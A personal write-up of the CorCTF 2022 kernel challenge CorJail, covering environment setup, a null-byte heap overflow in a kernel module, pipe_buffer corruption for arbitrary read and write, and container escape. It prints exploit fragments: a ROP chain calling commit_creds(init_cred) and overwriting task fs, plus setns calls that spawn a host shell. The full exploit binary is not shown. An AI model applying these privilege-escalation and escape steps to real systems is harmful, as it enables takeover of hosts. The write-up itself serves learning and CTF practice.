OFF-BY-NULL to Docker Escaping: CorJail (CorCTF 2022)

📑 Prologue

This is a write-up documenting a trial for the CTF challenge CorJail from CorCTF 2022. The challenge resource is avaliable on corCTF Github repo. The author’s write up is also good study resources. I exploited it by myself so using an different method. I’ll introduced the tiny problems I encountered and talk about the technical skills required for this challenge.

🏔️ Build the Enviroment

In the official github repo, not like other challenges, we only have bzImage but not filesystem . To reproduce the challenge, we have to rebuild the filesystem . The infrastructure is in the pwn/corjail/task/build/ dir. I found it’s hard to finish the enviroment building on my ubuntu22.04 but easy on ubuntu20.04. I used build_image.sh script to build the filesystem .

Considering the complex setup of this challenge. I also did some modifications to make the local debugging simpler. In this challenge, we are asked to first exploit a bug in a kernel module to get root privilege and than escape the docker container. If we have the correct enviroment, we gonna have a shell in a docker container, which is running in a QEMU VM. To ease debugging, we need to support the following two features:

  1. Get a root shell on the QEMU VM so we can get the kernel information (kallsyms, module) easier
  2. Upload EXP (our exploiting binary): I include a static netcat binary and modified the init/ jail scripts(/usr/local/bin) on the QEMU VM to support this feature. But I noticed there is network and curl after I solved the challenge read the official write up. In my method I kept running a script at backgroun after adding some forwarding settings for QEMU(-net user,hostfwd=tcp::49999-:49998 ):
#!/bin/bash
while true
do
nc -lp 49998  > /exp
chmod +x /exp
docker cp /exp `docker ps -aq`:/
done

After build the filesystem including debugging tools, we can run it with the ./run_challenge.sh script and get a user privileged shell in the docker container with a very cool CoROS logo. If we throw a binary to the 49999 port on the host (cat ./exp | nc -v 0.0.0.0 49999) we gonna see an EXP binary in the docker container.

Challenge

🎮 Challenge

The challenge implemened a kernel module enabling syscall usage monitoring. If we reverse the kernel module (cormon.ko), it’s not hard to locate the bug in cormon_proc_write:

	kheap_obj = (char *)kmem_cache_alloc_trace(kmalloc_caches[12], 2592LL, 4096LL);
  printk(&unk_578, kheap_obj);
  if ( kheap_obj )
  {
    _check_object_size(kheap_obj, length_user, 0LL);
    if ( copy_from_user(kheap_obj, a2, length_user) )
    {
      printk(&unk_5D0, a2);
      return -14LL;
    }
    else
    {
      kheap_obj[length_user] = 0; // Overflow with a null byte
      if ( (unsigned int)update_filter(kheap_obj) )
      {
        kfree(kheap_obj);
        return -22LL;
      }
...

The bug is an overflow bug but there is one null byte overflow on a 0x1000 object. There are two important facts about this vulnerability:

  1. The obejct size is fixed to be 0x1000 bytes
  2. Overflow a null byte

This bug is not hard to exploit for me since I exploited a similar bug with a simmilar method.

🗡️ Solution

We have to use the additional null byte corrput some metadata to gain more control and there is a perfect candidate for that: pipe_buffer . There is an page address at the offset 0 for pipe_buffer, which means we can overwrite it to point to another page:

struct pipe_buffer {
	struct page *              page;                 /*     0     8 */
	unsigned int               offset;               /*     8     4 */
	unsigned int               len;                  /*    12     4 */
	const struct pipe_buf_operations  * ops;         /*    16     8 */
	unsigned int               flags;                /*    24     4 */

	/* XXX 4 bytes hole, try to pack */

	long unsigned int          private;              /*    32     8 */

	/* size: 40, cachelines: 1, members: 6 */
	/* sum members: 36, holes: 1, sum holes: 4 */
	/* last cacheline: 40 bytes */
};

Here is my gdb functions to transfer a page struct address to a virtual address:

set $VM=0xffff888000000000
set $BASE=0xffffffff81000000
set $PAGE=0xffffea0000000000
define p2v
    p/x ($arg0-$PAGE)*0x40+$VM
end
define v2p
    p/x ($arg0-$VM)/0x40+$PAGE
end

Assuming we have a pipe struct next to the vulnerable object that ends with 0x40 (e.g., 0xffffea0000000040).If we overflow and change it to 0xffffea0000000000 , it points to a page before the page it should point to and enable our AAW/AAR on that page.

So our plan is:

  1. Spray lots of pipe_buffer list obejcts (size=0x1000)
  2. Create a hole in them
  3. Trigger the bug to overwrite the page struct address in pipe_buffer
  4. Arbitrary Read to leak
  5. Arbitrary Write to gain control flow hijacking

I chose the file objects as my targets since I can get the heap address simply from it and it has the f_op as the control flow hijacking target. There is a tip when we are attacking objects using pipe_buffer AAR/AAW that we should not modify the unesscessary data (especially in a docker container enviroment). I spent so much time since I currupted the data and trigger a null pointer dereference killing the kernel (eventpoll_release_file). Using some kernel heap fengshui skills gaining control flow hijacking is not hard. However, I have no experience to escape from a dcoekr container.

🚀 Docker Escape

Getting the information from my labmates daily chat, I only heard that is not hard as long as people have control flow hijacking. So I search for some kernelCTF script and find there are some articles and exploitation scripts to do that. I first tried the method mentioned on CVE-2021-22555.

  • Kernel ROP to switch_task_namespaces(find_task_by_vpid(1), init_nsproxy)
  • setns in usermode to escape
  setns(open("/proc/1/ns/mnt", O_RDONLY), 0);
  setns(open("/proc/1/ns/pid", O_RDONLY), 0);
  setns(open("/proc/1/ns/net", O_RDONLY), 0);

  char *args[] = {"/bin/bash", "-i", NULL};
  execve(args[0], args, NULL);

This method changes the namespaces for the task belonging to pid=1 to init_nsproxy . It sounds but it didn’t work well for me. I read more recent exploits from kernelCTF repo for CVE-2023-5345_lts_mitigation. This exploit uses a similar method performing the similar options: getting the task for current pid’s task and replace it with init_nsproxy . But it performs the switch option manually instead of using switch_task_namespaces . It worked for me!

The rop chain I used is quite similar to the one from kernelCTF

    // commit_creds(init_cred)
    ptr[index++] = rdi+1;
    ptr[index++] = rdi;
    ptr[index++] = init_cred;
    ptr[index++] = commit_creds;
    // mov [find_task_by_vpid(getpid())+1760], init_fs
    ptr[index++] = rdi;
    ptr[index++] = getpid();
    ptr[index++] = find_task_by_vpid;
    ptr[index++] = rcx;
    ptr[index++] = 1760; 
    ptr[index++] = add_rax_rcx_ret ; 
    ptr[index++] = rsi ; 
    ptr[index++] = init_fs ; 
    ptr[index++] = mov_qword_ptr_rax_rsi_ret;
    // land userspace
    ptr[index++] = swap_gs_iret;
    ptr[index++] = 0;
    ptr[index++] = 0;
    ptr[index++] = shellx;
    ptr[index++] = user_cs;
    ptr[index++] = user_rflags;
    ptr[index++] = user_sp|8;
    ptr[index++] = user_ss;

⚔️ EXP

Exploited

🧙🏽‍♂️ Epilogue

This challenge is a complete one including bug discovery, exploitation, and docker escaping. I practiced some pipe_buffer / fengshui skills on this challenge and performed my first docker escaping!

Also, thsi challenges mean very much to me since it’s the last CTF challenge Kyle sent me for practicing. I made it independetly within two days. Now I can confidently say that I know some kernel exploiation and I am ready to start CVE reproducing!